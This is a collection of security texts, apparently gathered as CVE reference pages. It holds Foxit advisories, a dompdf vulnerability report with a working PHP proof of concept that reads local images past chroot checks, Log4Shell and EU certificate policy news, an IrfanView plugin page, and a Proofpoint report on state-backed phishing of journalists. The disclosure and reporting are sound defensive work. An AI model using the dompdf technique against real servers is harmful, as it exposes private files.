This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader 11.2.1.53537. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Doc objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-16640.

May 12th, 2022

**Foxit PDF Reader Doc Object Use-After-Free Remote Code Execution Vulnerability****ZDI-22-763  
ZDI-CAN-16640**

CVE ID

CVE-2022-28672

CVSS SCORE

7.8, (AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H)

AFFECTED VENDORS

Foxit  

AFFECTED PRODUCTS

PDF Reader  

VULNERABILITY DETAILS

This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the handling of Doc objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process.  

ADDITIONAL DETAILS

Foxit has issued an update to correct this vulnerability. More details can be found at:  
https://www.foxit.com/support/security-bulletins.html  

DISCLOSURE TIMELINE

*   2022-03-02 - Vulnerability reported to vendor
*   2022-05-12 - Coordinated public release of advisory

CREDIT

Anonymous  

BACK TO ADVISORIES

CVE-2022-28672: ZDI-22-763

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PDF Reader 11.2.1.53537. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of ADBC objects. By performing actions in JavaScript, an attacker can trigger a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-16981.

July 7th, 2022

**Foxit PDF Reader newConnection Out-Of-Bounds Read Information Disclosure Vulnerability****ZDI-22-950  
ZDI-CAN-16981**

CVE ID

CVE-2022-34875

CVSS SCORE

3.3, (AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N)

AFFECTED VENDORS

Foxit  

AFFECTED PRODUCTS

PDF Reader  

VULNERABILITY DETAILS

This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

The specific flaw exists within the handling of ADBC objects. By performing actions in JavaScript, an attacker can trigger a read past the end of an allocated object. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process.  

ADDITIONAL DETAILS

Foxit has issued an update to correct this vulnerability. More details can be found at:  
https://www.foxit.com/support/security-bulletins.html  

DISCLOSURE TIMELINE

*   2022-05-09 - Vulnerability reported to vendor
*   2022-07-07 - Coordinated public release of advisory

CREDIT

Mat Powell of Trend Micro Zero Day Initiative  

BACK TO ADVISORIES

CVE-2022-34875: ZDI-22-950

In Kentico before 13.0.66, attackers can achieve Denial of Service via a crafted request to the GetResource handler.

CVE-2022-32387: Hotfixes

External Control of File Name or Path in GitHub repository dompdf/dompdf prior to 2.0.0.

**Description**

The Scenario 3 you described in this report (https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/) actually opens up the ability to bypass chroot checks.

**Proof of Concept**

1: Make sure you install Dompdf from GitHub (https://github.com/dompdf/dompdf/) and include the following autoload.inc.php in dompdf/autoload.inc.php:

    <?php
    /**
     * @package dompdf
     * @link    http://dompdf.github.com/
     * @author  Benj Carson <benjcarson@digitaljunkies.ca>
     * @author  Fabien Ménager <fabien.menager@gmail.com>
     * @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License
     */
    
    // HMLT5 Parser
    require_once __DIR__ . '/lib/html5lib/Parser.php';
    
    // Sabberworm
    spl_autoload_register(function($class)
    {
        if (strpos($class, 'Sabberworm') !== false) {
            $file = str_replace('\\', DIRECTORY_SEPARATOR, $class);
            $file = realpath(__DIR__ . '/lib/php-css-parser/lib/' . (empty($file) ? '' : DIRECTORY_SEPARATOR) . $file . '.php');
            if (file_exists($file)) {
                require_once $file;
                return true;
            }
        }
        return false;
    });
    
    // php-font-lib
    require_once __DIR__ . '/lib/php-font-lib/src/FontLib/Autoloader.php';
    
    //php-svg-lib
    require_once __DIR__ . '/lib/php-svg-lib/src/autoload.php';
    
    
    /*
     * New PHP 5.3.0 namespaced autoloader
     */
    require_once __DIR__ . '/src/Autoloader.php';
    
    Dompdf\Autoloader::register();
    

2: With a sample image file cat.jpg in /var/www/html/cat.jpg, (find any photo will do):

3: Create vuln2.php:

    <?php
    // Include autoloader 
    require_once 'dompdf/autoload.inc.php'; 
    
    // Reference the Dompdf namespace 
    use Dompdf\Dompdf; 
    use Dompdf\Options;
    
    $options = new Options();
    $options->set('isRemoteEnabled', true);
    
    $dompdf = new Dompdf($options);
    
    // Load HTML content 
    $dompdf->loadHtml('<base href="http://example.com"><img src="file:///var/www/html/cat.jpg" />');
    
    // (Optional) Setup the paper size and orientation
    $dompdf->setPaper('A4', 'landscape'); 
     
    // Render the HTML as PDF 
    $dompdf->render(); 
     
    // Output the generated PDF to Browser 
    $dompdf->stream(); 
    
    ?>
    

If you visit the above in the browser you should see cat.jpg image being included into the PDF file even though chroot option is not set.

**Impact**

This vulnerability is capable of bypassing chroot checks essentially leading to disclosure of png and jpeg files. This was tested with allow\_url\_fopen and on Linux. Additionally, this was tested on a fresh install of dompdf.

**Analysis:**

This bug occurs because in Line 68:

    $remote = ($protocol && $protocol !== "file://") || ($parsed_url['protocol'] != "");
    

    ($protocol && $protocol !== "file://") => True ( http:// !== file:// )
    

Therefore, the file:///var/www/html/cat.jpg will be treated as a remote file without the need for chroot checks.

CVE-2022-2400: External Control of File Name or Path in dompdf

Inaugural report from cyber safety panel outlines strengths and weaknesses exposed by momentous security flaw

Inaugural report from cyber safety panel outlines strengths and weaknesses exposed by momentous security flaw

The ‘Log4Shell’ vulnerability in open source library Log4j has reached “endemic” proportions and the aftershock could reverberate for “a decade or longer”, according to a landmark US government report.

The inaugural report by the Cyber Safety Review Board (CSRB) provided 19 recommendations for how organizations and government agencies can bolster their networks and applications against the threat.

The CSRB was established in February 2022 by the Department of Homeland Security (DHS) as mandated by a cybersecurity-focused Executive Order that was signed by President Biden a year earlier.

The public-private initiative is tasked with reviewing serious cybersecurity events and delivering strategic recommendations to government, industry, and the information security community.

**‘Transformational institution’**

The Log4Shell vulnerability, which surfaced in December 2021, offers a potent combination of super-criticality – notching a maximum CVSS severity score of 10 – and enormous attack surface given Log4j’s near-ubiquity in providing Java-based logging to myriad applications.

Secretary of homeland security Alejandro Mayorkas said the CSRB was a “transformational institution that will advance our cyber resilience in unprecedented ways”, and its report will help “strengthen our cyber resilience and advance the public-private partnership that is so vital to our collective security”.

Tim Mackey, principal security strategist at the Synopsys Cybersecurity Research Centre, said the report was unusual in providing “a comprehensive review of the impact and root causes of a cyber incident so quickly”.

DON’T FORGET TO READ Prototype pollution in Blitz.js leads to remote code execution

The CSRB report (PDF), published on July 14, said “vulnerable instances of Log4j will remain in systems for many years to come, perhaps a decade or longer. Significant risk remains.”

The Apache Software Foundation, which maintains Log4j, was praised for its “well-established software development lifecycle” and “for recognizing the criticality of the problem” in quickly issuing patches.

The report also hailed the rapid production of effective guidance, tools, and threat information by vendors and governments.

Further down the supply chain, however, “organizations still struggled to respond to the event, and the hard work of upgrading vulnerable software is far from complete across many organizations”.

Moreover, the event highlighted “security risks unique to the thinly-resourced, volunteer-based open source community”, which the CSRB said needed more support from both public and private sector stakeholders.

**‘Hard to believe’**

The report said the CSRB was “not aware of any significant Log4j-based attacks on critical infrastructure systems”, and that hostile exploitation seemed to have “occurred at lower levels than many experts predicted”.

However, Matt Chiodi, chief trust officer at security vendor Cerby, found these claims “very hard to believe”, noting that – as the CSRB itself acknowledged – organizations are not obliged to report exploitation of serious vulnerabilities.

Read more of the latest Log4j vulnerability news and analysis

Chiodi also said the recommendations, which among other things cover mitigating ongoing Log4j risks and migrating to a proactive vulnerability management model, “are too opaque for companies to implement in their current form”.

He advised organizations to get “deadly serious about knowing your assets and moving toward a zero-trust architecture”, noting that “most organizations have terrible asset management practices”, particularly in relation to “homegrown applications in the cloud”.

Mackey, meanwhile, cautioned against “reliance on a commercial vendor to alert consumers of a problem presumes that the vendor is properly managing their usage of open source and that they are able to identify and alert all users of their impacted software – even if support for that software has ended.”

With this in mind, “software consumers should implement a trust-but-verify model to validate whether the software they’re given doesn’t contain unpatched vulnerabilities”.

RELATED Bug Alert launched to provide early warning system for super-critical vulnerabilities

‘Endemic’ Log4j bug set to persist in the wild for at least a decade, US government warns 

An issue was discovered in DSK DSKNet 2.16.136.0 and 2.17.136.5. The Touch settings allow unrestricted file upload (and consequently Remote Code Execution) via PDF upload with PHP content and a .php extension. The attacker must hijack or obtain privileged user access to the Parameters page in order to exploit this issue. (That can be easily achieved by exploiting the Broken Access Control with further Brute-force attack or SQL Injection.) The uploaded file is stored within the database and copied to the sync web folder if the attacker visits a certain .php?action= page.

CVE-2022-24688: DSK Systems

IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!ShowPlugInSaveOptions_W+0x0000000000002cba.

**Please always use the current IrfanView and PlugIn version.**

  
**How to install IrfanView PlugIns?**

1.  Download all PlugIns, see below
2.  Click on the PlugIn file (irfanview\_plugins\_XYZ\_setup.exe)
3.  PlugIns will be installed into IrfanView "PlugIns" directory 

**Note:** Install 32-bit PlugIns to IrfanView-32 and 64-bit PlugIns to IrfanView-64 folder. **DO NOT** mix the PlugIns and IrfanView bit versions. 

**The current PlugIns version is: 4.60** 

**Note:** A normal IrfanView version includes the following (most important) PlugIns: **Effects, Paint, Icons, Slideshow-EXE, RegionCapture, JPG-Transform, Video, Metadata, Tools.**

  **Check the 64-bit page for 64-bit PlugIns.**  

1.  **You can download ALL (32-bit) PlugIns as one large EXE (recommended):**  **FossHub - download IrfanView plugins Installer**
    
    Alternative download site: iview460\_plugins\_setup.exe (20.2 MB, installer)  
    (SHA-256 checksum: 0a967a007c296944575962e66586bfada7c32012675dc1a0ae1cec982bb755f8)
    
  
3.  **You can download ALL (32-bit) PlugIns as one large ZIP (for experienced users!):**  **FossHub - download IrfanView plugins ZIP**
    
    Alternative download site: iview460\_plugins.zip (18.4 MB)  
    (SHA-256 checksum: 628a088067c0e4baf02ab87698fc0bf66b2b59cb1eee9ff08c95535e741cd654)
    

**Special PlugIn: "IrfanView Shell Extension":**

This PlugIn shows a **Context menu for some IrfanView operations in Windows Explorer or other file managers.**   
You can select several files and: Play slideshow, Load files in Thumbnails window, Start JPG Lossless Rotation, Convert images to another format, Save filenames as TXT, Create multipage TIF or PDF, Create panorama image. (current version: 1.06)

Download: https://www.irfanview.net/plugins/irfanview\_shell\_extension\_plugin.exe (Installer)  
(SHA-256 checksum: b9828e236b26626b46fe20ad31208140fc572819ba86c2cba75cbd2c7724ebef)

or 

https://www.irfanview.net/plugins/irfanview\_shell\_extension.zip (ZIP, for experienced users!)  
(SHA-256 checksum: 2112f85a917b2eca90eaa047a8c3b22e0157f13e83971aee679d955b2ff1047d)

**You can download the (32-bit) PlugIns as 4 separate ZIP files (for experienced users!):**

1.  iv\_mmedia.zip. Contains these PlugIns: IV\_Player, Med, Mp3, Burning, Nero, Quicktime, Real Audio, SoundPlayer.
2.  iv\_formats.zip.  Contains these PlugIns: Awd, B3d, BabaCAD4Image, CamRAW, Crw, CADImage, Dicom, DjVu, Dpx, Ecw, Exr, Flash, Flif, Formats, Fpx, Hdp, Ics, ImPDF, ImPDN, JPEG2000, Jpeg\_LS, Jpm, Mng, MrSID, PDF, PhotoCD, OptiPNG, Postscript, Sff, Svg, Wbz, WebP, Wsq, Xcf.
3.  iv\_effects.zip.   Contains these PlugIns: Filter Sandbox, Film Simulation, Filter Factory, Filters Unlimited.
4.  iv\_misc.zip.      Contains these PlugIns: Email, FaceDetect, Ftp, Lcms.

**PlugIns updated after the version 4.60:**

*   CamRAW Plugin (4.60) - ZIP (32 bit) or ZIP (64 bit) - Support for Olympus OM-1 RAW format

**Available PlugIns and current versions:**

*   **AltaLux** - (version **1.08**): allows IrfanView to use AltaLux image effect
*   **AWD** - (version **2.0.0.0**): allows IrfanView to read Artweaver files
*   **B3D** - (version **4.56**): allows IrfanView to read BodyPaint 3D files
*   **BabaCAD4Image** - (version **1.3.2**): allows IrfanView to to read DXF and DWG CAD files
*   **BURNING** - (version **4.51**): allows IrfanView to burn slideshow to a CD/DVD/BD (Windows XP SP3 or later required)
*   **BURNINGOLD** - (version **4.36**): allows IrfanView (32-bit) to burn slideshow to a CD (Windows XP or later required, Nero option can burn Data DVD and VCD)
*   **CADImage** - (version **14.0.0.1**): allows IrfanView to read DXF/DWG/HPGL/CGM/SVG files (Shareware, third party plugin)  
    Newest 32-bit versions under: https://www.cadsofttools.com/download/irfanviewplugins.zip , newest 64-bit versions: https://www.cadsofttools.com/download/irfanviewplugins\_x64.zip
*   **CamRAW** - (version **4.58**): allows IrfanView to to read Digital Camera RAW files  
    (formats: DNG, EEF, NEF, ORF, RAF, MRW, DCR, SRF/ARW, PEF, X3F)
*   **CRW** - (version **4.58**): allows IrfanView (32-bit) to read Canon CRW/CR2 files (high resolution image version) **  
    Note:** this PlugIn requires additional Canon DLLs. You can download these DLLs with the Canon ZoomBrowser program: https://www.canon.com/ or try here: https://www.irfanview.info/plugins/canon\_crw.zip (check "Readme.txt" for instructions and install!)
*   **DICOM** - (version **4.60**): allows IrfanView to read Dicom formats (DCM, ACR, IMA)
*   **DJVU** - (version **4.56**): allows IrfanView to read DJVU format
*   **DPX** - (version **4.56**): allows IrfanView to read DPX/CIN (Digital Picture Exchange/Cineon) format
*   **ECW** - (version **4.56**): allows IrfanView to read/write ECW files (Enhanced Compressed Wavelet)
*   **EFFECTS** - (version **4.59**): contains image effects and allows IrfanView to load Adobe Photoshop 8BF filters **Note:** some nice (fixed menu) Adobe 8BF Plugins/effects can be downloaded/installed from: https://www.irfanview.net/plugins/irfanview\_adobe\_8bf\_plugins.exe (Installer) or https://www.irfanview.net/plugins/irfanview\_adobe\_8bf\_plugins.zip **  
    Note:** some older/special 8BFs may require additional system DLLs: Msvcrt10.dll and/or Plugin.dll. You can download these DLLs here: https://www.irfanview.info/plugins/8bf\_tools.zip (check "Readme.txt" for instructions and install!)
*   **EMAIL** - (version **4.59**): allows IrfanView to send images as emails
*   **EXR** - (version **4.56**): allows IrfanView to read EXR files
*   **FACEDETECT** - (version **2.00**): allows IrfanView to use the Face Detection feature from Thumbnails window  
    If you have a modern graphic card which can be used for additional calculations, you can try the GPU version of the plugin: https://www.irfanview.info/plugins/facedetect\_gpu.zip
*   **FILM\_SIMULATION** - (version **1.0.0.0**): allows IrfanView to apply some Film Simulation effects **  
    Note:** this PlugIn needs additional CLUT files, download/install from: https://www.irfanview.net/plugins/irfanview\_film\_sim\_plugin.zip
*   **FILTER\_FACTORY** - (version **4.53**): allows IrfanView to use Filter Factory 8BF files (Photoshop PlugIns)
*   **FLASH** - (version **2.2.0.1**): allows IrfanView to read Flash/Shockwave/FLV format
*   **FLIF** - (version **4.56**): allows IrfanView to read FLIF (Free Lossless Image) format
*   **FORMATS** - (version **4.60**): allows IrfanView to read some rare image formats  
    (formats: PCX, QOI, PSP, DDS, G3, RAS, IFF/LBM, BioRAD, Mosaic, XBM, XPM, GEM-IMG, SGI, RLE, WBMP, TTF, FITS, PIC, MAG, WAD, WAL, CAM, SFW, YUV, PVR, SIF and old/retro formats from Amiga, Atari, C64, ZX Spectrum etc.)
*   **FPX** - (version **4.56**): allows IrfanView (32-bit) to read FlashPix files
*   **FTP** - (version **4.50**): allows IrfanView to transfer files from Thumbnails window using FTP
*   **FILTERS\_UNLIMITED** - (version **3.20**): allows IrfanView (32-bit) to use Filters Unlimited files (Photoshop PlugIns and filters)
*   **HDP** - (version **4.56**): allows IrfanView to read Jpeg-XR/HDP/WDP (Microsoft HD Photo) files
*   **ICONS** - (version **4.30**): additional icons for IrfanView file associations
*   **ICS** - (version **4.56**): allows IrfanView (32-bit) to read ICS files (Image Cytometry Standard)
*   **IMPDF** - (version **0.90**): allows IrfanView (32-bit) to write PDF files (Portable Document Format)
*   **IMPDN** - (version **1.16**): allows IrfanView to read PDN files (Paint.NET File Format)
*   **IRFANVIEW\_SANDBOX** - (version **1.3.0.14**): allows IrfanView to use JewelScript Effects/Filters
*   **IV\_PLAYER** - (version **4.54**): allows IrfanView to play video/sound/audio-cd files using Windows Media Player
*   **JPEG2000** - (version **4.56**): allows IrfanView to read/write JPEG 2000 files
*   **JPEG\_LS** - (version **4.56**): allows IrfanView to read/write JPEG-LS files
*   **JPEG\_XL** - (version **4.59.1**): allows IrfanView to read/write JPEG-XL files
*   **JPEGQS** - (version **2020-05-17**): allows IrfanView to read JPG files using QuantSmooth method
*   **JPG\_TRANSFORM** - (version **4.59**): allows IrfanView to support lossless JPG operations (rotation/crop/cleaning, EXIF date editing, EXIF thumb update)
*   **JPM** - (version **4.56**): allows IrfanView to read/write JPM files
*   **LCMS** - (version **4.58**): allows IrfanView to use color management
*   **MED** - (version **3.31**): allows IrfanView (32-bit) to play MED/OctaMED audio files
*   **METADATA** - (version **4.60**): allows IrfanView to handle EXIF/IPTC/Comment information from compatible files
*   **MNG** - (version **4.57**): allows IrfanView to read/play MNG/JNG files
*   **MP3** - (version **4.52**): allows IrfanView to play MP3/MP2/MP1 files
*   **MRC** - (version **3.70**): allows IrfanView (32-bit) to read MRC files
*   **MR-SID** - (version **4.56**): allows IrfanView to read LizardTech's SID files **  
    Note:** this PlugIn needs additional DLLs (for IrfanView 32-bit only), download/install from: https://www.irfanview.net/plugins/irfanview\_mrsid\_plugin.exe (Installer) or https://www.irfanview.net/plugins/irfanview\_mrsid\_plugin.zip
*   **NERO** - (version **4.20**): allows IrfanView (32-bit) to burn slideshow to data or Video CD, using Nero Burning ROM software
*   **OCR\_KADMOS** - (version **4.4y**): adds OCR features to IrfanView PlugIn download: https://www.irfanview.info/plugins/kadmos/**  
    Note: the OCR PlugIn works only with IrfanView 32-bit.**
*   **OPTIPNG** - (version **4.59**): this PlugIn allows optimized PNG saving
*   **PAINT** - (version **0.4.13.57**): allows IrfanView to to paint lines, circles, arrows, straighten image etc.
*   **PDF** - (version **4.58**): allows IrfanView to read/save PDF files (Portable Document Format)
*   **PHOTO-CD** - (version **3.00**): allows IrfanView to read Kodak PCD files (high resolutions)
*   **POSTSCRIPT** - (version **4.59**): allows IrfanView to read EPS/PS/PDF files (using Ghostscript, take the **32-bit (!) EXE installer**, like "gs926w32.exe") or Ghostscript **64-bit for IrfanView 64-bit** (like "gs926w64.exe").
*   **QUICKTIME** - (version **4.56**): allows IrfanView to play/read Apple Quicktime files
*   **REAL-AUDIO** - (version **3.37**): allows IrfanView (32-bit) to play Real-Audio RA files
*   **REGIONCAPTURE** - (version **2.4.3**): allows IrfanView to capture a rectangle area of the screen
*   **SFF** - (version **4.56**): allows IrfanView to read SFF (Structured Fax) Files
*   **SLIDESHOW** - (version **4.57**): allows IrfanView to create presentations in EXE or SCR format (standalone executable/screen saver)
*   **SOUND\_PLAYER** - (version **4.39**): allows IrfanView to play OGG files (Ogg Vorbis)
*   **STUB\_LOADER** - (version **1.2.5**): allows loading of old (32 bit) PlugIns in IrfanView 64 bit (used also for scanning in IrfanView-64)
*   **SVG** - (version **0.85**): allows IrfanView to read SVG (Scalable Vector Graphic) files
*   **TOOLS** - (version **4.58**): contains some additional functions/features for IrfanView  
    (and some special formats, like: HEIC, AVIF; with installed codecs/extensions)
*   **VIDEO** - (version **4.57**): allows IrfanView to play many video/sound formats
*   **WBZ** - (version **1.01**): allows IrfanView to read WebShots (WBZ/WBC/WB1) files
*   **WEBP** - (version **4.57**): allows IrfanView to read/write WEBP (Weppy Format) files
*   **WPG** - (version **3.1.2**): allows IrfanView to read WPG (version 1) files
*   **WSQ** - (version **2019.10.15**): allows IrfanView to read WSQ (Wavelet Scaler Quantization) files
*   **XCF** - (version **0.1.4**): allows IrfanView to read XCF files

**For developers:** If you want to write your own plugins for IrfanView (support for new image formats or effects (please no private formats)), please send me an email for details.

CVE-2020-23563: IrfanView PlugIns

Mozilla’s message to MEPs appears to be gaining traction, says senior public policy manager at the non-profit

Mozilla’s message to MEPs appears to be gaining traction, says senior public policy manager at the non-profit

Mozilla has stepped up its efforts to dissuade EU lawmakers from forcing web browsers to recognize the validity of contentious web certificates created by the bloc.

The non-profit architect of the Firefox browser has launched a campaign urging Members of the European Parliament (MEPs) to amend proposals tabled by the European Commission (EC) that would oblige browsers to accept Qualified Website Authentication Certificates (QWACs).

**QWACkers**

The EU created QWACs in 2014 to validate a website’s professed identity and therefore – in theory – protect users from fraud, malware, and surveillance.

However, QWACs, which are based on somewhat discredited extended validation certificates, have failed to gain much of a foothold in the web ecosystem in the eight years since their introduction.

Mozilla argues that QWACs are inferior to the existing, longstanding web authentication ecosystem, and that the EC proposal would bypass “the critical first line of defense against cybercrime on the web”.

With MEPs expected to vote on the proposal in October, Mozilla launched a #SecurityRiskAhead campaign yesterday (July 13) with a carnival-style duck-fishing game pitched outside the European Parliament in Brussels.

BACKGROUND EU web authentication plan threatens to undercut browser-led system, detractors claim

Owen Bennett, Mozilla’s senior public policy manager for Europe, told The Daily Swig that Mozilla’s message appeared to be gaining traction.

The QWACs amendment – article 45.2 – was deleted from a recent draft report (PDF) for the EU’s digital identity framework in order to accommodate revisions, and various security-related amendments have already been tabled in parliament, he said.

An open letter urging a rethink, published in March by 38 security experts, was “a big turning point” in persuading MEPs, Bennett believes.

The Internet Society, Electronic Frontier Foundation (EFF), and the world’s largest certificate authority, Let’s Encrypt, have also campaigned against the proposal.

**Trusted system**

The browser-led web authentication system in place sees certificated websites using the TLS-encrypted HTTPS protocol and displaying a padlock icon in the URL address bar to advertise their secure status.

DON’T FORGET TO READ HTTP/3 evolves into RFC 9114 – a security advantage, but not without challenges

Web – or SSL – certificates are currently issued by more than 100 certificate authorities (CAs), which are vetted by Mozilla and other leading browser makers, including Google, Microsoft, and Apple.

Critics of QWACs, which are issued by ‘Trust Service Providers’ (TSPs) approved by governments of EU member states, argue that they cannot draw on comparable technical expertise and resources. They can also point to the fact that hundreds of millions of web users happily submit payment card details online as evidence that the status quo is widely, and justifiably, trusted.

Mozilla takes its message direct to MEPs by pitching up outside the European Parliament

Mozilla CSO Marshall Erwin warned that if the well-intentioned EC proposal were “copied elsewhere, the regulation will give the tools to governments to carry out state-sponsored surveillance of internet traffic”.

Mozilla cited large-scale snooping campaigns by Iran’s theocracy in 2011 and the governments of Kazakhstan and Mauritius in 2020 and 2021 respectively as examples of the activity the regulation could enable.

**‘Ceiling on website security’**

“Article 45 puts a ceiling on website security,” said Bennet. “It says you must accept QWACs, not put in place any additional protections, and not take action when a certificate authority is found to be compromised. For us that creates an untenable risk to Firefox users.”

The EU’s digital identity framework will be incorporated into the electronic Identification, Authentication, and Trust Services (eIDAS) regulation, which was enacted in 2014 to facilitate the emergence of a European internal market for trust services.

RECOMMENDED Decentralized Identifiers: Everything you need to know about the next-gen web ID tech

Bennett said the campaign was not seeking to “blow up the whole regulation”, but that Mozilla simply wanted “some small tweaks” to give browsers the “discretion to take action when an entity issuing QWACs doesn’t meet existing security standards or poses a security risk”.

A spokesperson for the European Commission told The Daily Swig:

The eIDAS Regulation is technology neutral. QWACs were introduced in 2014 as a means to enhance trust and reduce fraud and is used to ensure trusted transactions in the PSD2 environment (as a means for Payment Service Providers to identify).

The concerns raised by the browser community is based on an understanding of the technical implementation of the obligation to recognise QWACs which is not supported by the Commission legal proposal. The Commission proposal intends to achieve recognition of QWACs in the browser environment, which can be achieved without interfering with existing root store policies and web browser security requirement. There is no reason why a certificate issued as trustworthy according to EU law should not be recognised as such by the browser community.

In collaboration with the relevant standardisation bodies and the availability of commonly and globally accepted standards, the implementing act referred to in Article 45 will set out the technical specifications/references to the applicable standards which will enable the recognition of QWACs in accordance with the above.

YOU MIGHT ALSO LIKE Oblivious DNS-over-HTTPS offers privacy enhancements to secure lookup protocol

Crunch time for EU web authentication plan as Mozilla launches campaign to protect status quo

Since 2021, various state-aligned threat groups have turned up their targeting of journalists to siphon data and credentials and also track them.

Since 2021, various state-aligned threat groups have turned up their targeting of journalists to siphon data and credentials and also track them.

Targeted phishing attacks are traced to multiple threat actors who have each independently focused on stealing credentials and sensitive data and tracking the geolocation of journalists.

In a Thursday report by Proofpoint, researchers outline individual efforts by advance persistent threat (APT) groups who they say are aligned with China, North Korea, Iran and Turkey. Attacks began in early 2021 and are ongoing, researchers said.

According to the report, the APTs are acting independently of each other but share the same overall goal of targeting journalists. Tactics are also similar, with threat actors targeting email and social-media accounts as phishing inroads in cyberespionage campaigns.

Often posing as journalists themselves, the threat actors have focused on phishing campaigns with the goal of credential harvesting, theft of data helpful to specific regimes and digital surveillance of political journalists.

****APT Tradecraft: The Phish**  **

The attacks typically involved some type of social engineering to lower the guard of targets in order to coax them to download and execute various malicious payloads onto their personal digital devices, researchers said. Lures included emails and messages sent via various social media platforms on topics related to their area of political focus, researchers said.

_\[**FREE On-demand Event**: Join Keeper Security’s Zane Bond in a Threatpost roundtable and learn how to securely access your machines from anywhere and share sensitive documents from your home office. **WATCH HERE**.\]_

In various instances the attackers would lie low, post malware infection, in order to gain persistence on a recipient’s network and conduct lateral network reconnaissance and propagate additional malware infections within the target’s network.

Secondary tactics included tracking or surveilling journalists. Proofpoint said adversaries used web beacons planted on journalists’ devices to carry out the surveillance.

****Journalist Have Been Targeted Before, But Not Like This****

While the latest report tracks some of the most recent activity against journalists, targeting this group of individuals certainly isn’t novel, given the type of information to which journalists have access to when it comes to political and socio-economic issues, they noted.

“APT actors, regardless of their state affiliation, have and will likely always have a mandate to target journalists and media organizations and will use associated personas to further their objectives and collection priorities,” researchers wrote.

Moreover, this focus on media by APTs is unlikely to ever wane, which should inspire journalists to do everything they can to secure their communications and sensitive data, they said.

****China-backed APTs Strike in U.S.****

Between January and February 2021, Proofpoint researchers identified five campaigns by

Chinese APT TA412, also known also as Zirconium, targeting US-based journalists, most notably those covering U.S. politics and national security during events that gained international attention, researchers said.

The way the campaigns were crafted depended upon the current U.S. political climate, and attackers switched targets depending on which journalists were covering topics in which the Chinese government has interest, they said.

One reconnaissance phishing campaign occurred in the days immediately preceding the Jan. 6 attack on the U.S. Capitol building, with attackers focusing specifically on White House and Washington-based correspondents during this time, they said.

Attacker used subject lines pulled from recent U.S. news articles related to pertinent political topics at the time, including actions of former President Donald Trump, U.S. political movements related to China and, more recently, the U.S. stance and involvement in Russia’s war against Ukraine, researchers said.

****Varying Payloads****

In the observed campaigns, Zirconium used as its payload web beacons, a tactic consistent with malicious cyberespionage campaigns against journalists that the APT has conducted since 2016, researchers said.

Web beacons, commonly referred to as tracking pixels, tracking beacons, or web bugs, embed a hyperlinked non-visible object within the body of an email that, when enabled, attempts to retrieve a benign image file from an actor-controlled server.

“Proofpoint researchers assess these campaigns have been intended to validate targeted emails are active and to gain fundamental information about the recipients’ network environments,” they wrote.

Researchers observed another Chinese-backed APT, TA459, in late April 2022 targeting media personnel in Southeast Asia with emails containing a malicious Royal Road RTF attachment, if opened, would install and execute Chinoxy malware–a backdoor that is used to gain persistence on a victim’s machine.

The targeted entity was responsible for reporting on the Russia-Ukraine conflict, which aligns with TA459’s historic mandate of collecting on intelligence matters related to Russia and Belarus, researchers noted.

****Fake Job Opportunities from North Korea****

Researchers also observed North Korea-aligned TA404—better known as Lazarus–in early 2022 targeting a U.S.-based media organization with phishing attacks that appeared to offer job opportunities from reputable companies to journalists, they reported. The attack is reminiscent of a similar one against engineers that the group mounted in 2021.

“It started with reconnaissance phishing that used URLs customized to each recipient,” researchers wrote of the recent phishing campaign. “The URLs impersonated a job posting with landing pages designed to look like a branded job posting site.”

The sites were fraudulent, however, and the URLs were armed to relay identifying information about the computer, or device someone was working from to allow the host to keep track of the intended target, researchers said.

****Turkey-backed APT Targets Twitter Credentials****

APTs with alleged ties to Turkey’s government have also targeted journalists, with one campaign including one “prolific threat actor” TA482 observed by Proofpoint. According to researchers, the APT has been actively targeting journalists since early 2022, via Twitter accounts in efforts to steal credentials from mainly U.S.-based journalists and media organizations.

The motive behind the group appears to be to spread propaganda in support of President Recep Tayyip Erdogan the Turkish ruling political party, Justice and Development Party, though this cannot be confirmed with certainty, researchers noted.

The campaigns use phishing emails typically related to Twitter security—alerting a user to a suspicious log-in–to gain the recipient’s attention, taking them to a credential harvesting page that impersonates Twitter if they click on a link.

****Iranian APTs Harvest Credentials****

Iran-linked APTs have been particularly active on their assault against journalists and newspapers, typically posing as journalists themselves in attacks to engage in surveillance against targets and harvest their credentials, Proofpoint has found.

One of the most active perpetrators of these attacks is TA453, known as Charming Kitten, a notorious group aligned with intelligence collection efforts of Iran’s Islamic Revolutionary Guard Corp, Proofpoint said.

This group is notorious for masquerading as journalists from around the world to target journalists, academics and researchers alike by engaging in discussion about

foreign policy or other topics related to the Middle East, after which they will be invited to a virtual meetings via a customized, but benign PDF.

However, the PDF—typically delivered from file hosting services—almost always contains a link to a URL shortener and IP tracker that redirects targets to actor-controlled credential-harvesting domains, researchers said.

TA456, also known as Tortoiseshell, is another Iran-aligned threat actor that routinely poses as media organizations to target journalists with newsletter-themed emails containing web beacons that can track targets.

Another Iranian state-sponsored actor, TA457, hides behind the persona of a fake media organization called “iNews Reporter” to deliver malware to public relations personnel

for companies located in the United States, Israel and Saudi Arabia, researchers said. Between September 2021 and March 2022, Proofpoint observed campaigns by the prolific threat actor that occurred approximately every two to three weeks, they said.

In one campaign that occurred in March 2022, TA457 sent an email with the ironic subject line “Iran Cyber War” that ultimately dropped a remote access trojan on victims’ machines. The campaign was seen targeting both individual and group email addresses at a handful of Proofpoint customers involved in energy, media, government and manufacturing, researchers reported.

